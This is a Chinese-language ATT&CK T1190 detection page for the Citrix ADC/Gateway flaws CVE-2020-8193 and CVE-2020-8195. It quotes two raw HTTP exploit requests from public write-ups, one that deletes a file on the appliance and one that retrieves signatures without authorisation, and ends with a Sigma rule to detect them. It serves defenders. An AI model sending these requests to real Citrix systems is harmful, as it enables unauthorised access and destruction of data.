跳转至

T1190-CVE-2020-8193/CVE-2020-8195

来自ATT&CK的描述

使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。

如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。

对于网站和数据库,OWASP排名前10位和CWE排名前25位突出了最常见的基于Web的漏洞。

测试案例

Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚拟软件定义的广域网)设备。Citrix Systems Citrix ADC、Citrix Gateway和Citrix SDWAN WAN-OP中存在安全漏洞。攻击者可利用该漏洞绕过权限限制。

检测日志

HTTP.log

测试复现

漏洞利用方式建议参考:

Citrix Systems产品安全漏洞 CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 poc

https://www.cnblogs.com/potatsoSec/p/13281577.html

Citrix安全研究历险记

https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html

测试留痕

暂无实测,截取部分公开资料内容作为留痕数据。

删除文件

POST /rapi/filedownload?filter=remove:1,path:%2ftmp%2ftest HTTP/1.1 
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/menu/neo
If-Modified-Since: Thu, 01 Jan 1970 05:30:00 GMT
rand_key: 2061490565.1580290269373855
DNT: 1
X-NITRO-USER: henk
X-NITRO-PASS: henk
Connection: close
Cookie: startupapp=neo; is_cisco_platform=0; st_splitter=350px; rdx_pagination_size=25%20Per%20Page; SESSID=05afba59ef8e0e35933f3bc266941337
Content-Type: application/xml
Content-Length: 31

<clipermission></clipermission>

以上内容截取自https://www.cnblogs.com/potatsoSec/p/13281577.html

获取默认所有签名

POST /pcidss/report?type=all_signatures&sid=254&username=nsroot&profile_name=default&set=0&sig_name=_default_signature_&sig_start_no=1 HTTP/1.1
Host: citrix.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://citrix.local/pcidss/launch_report?type=main
Content-Type: application/xml
Content-Length: 0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

以上内容截取自https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html

检测规则/思路

sigma规则

title: 检测可疑的CVE-2020-8193/CVE-2020-8195
references:
    - https://www.cnblogs.com/potatsoSec/p/13281577.html
    - https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/
status: experimental
date: 2020/07/10
tags:
    - attack.initial_access
    - attack.t1190
logsource:
    category: webserver
detection:
    selection1:
        c-uri|contains: 
            - '/rapi/filedownload?filter=path:%2F' #删除文件时POST请求,URL路径包含的字段。
    selection2:
        c-uri|contains|all:
            - '/pcidss/report' #获取所有默认签名时POST请求URL内包含的字段
            - 'type=all_signatures'
            - 'sig_name=_default_signature_'
    condition: 1 of them
fields:
    - client_ip
    - vhost
    - url
    - response
falsepositives:
    - Unknown
level: critical

建议

建议使用HTTP流量+安全设备进行检测分析,研判攻击是否成功。

参考推荐

MITRE-ATT&CK-T1190

https://attack.mitre.org/techniques/T1190/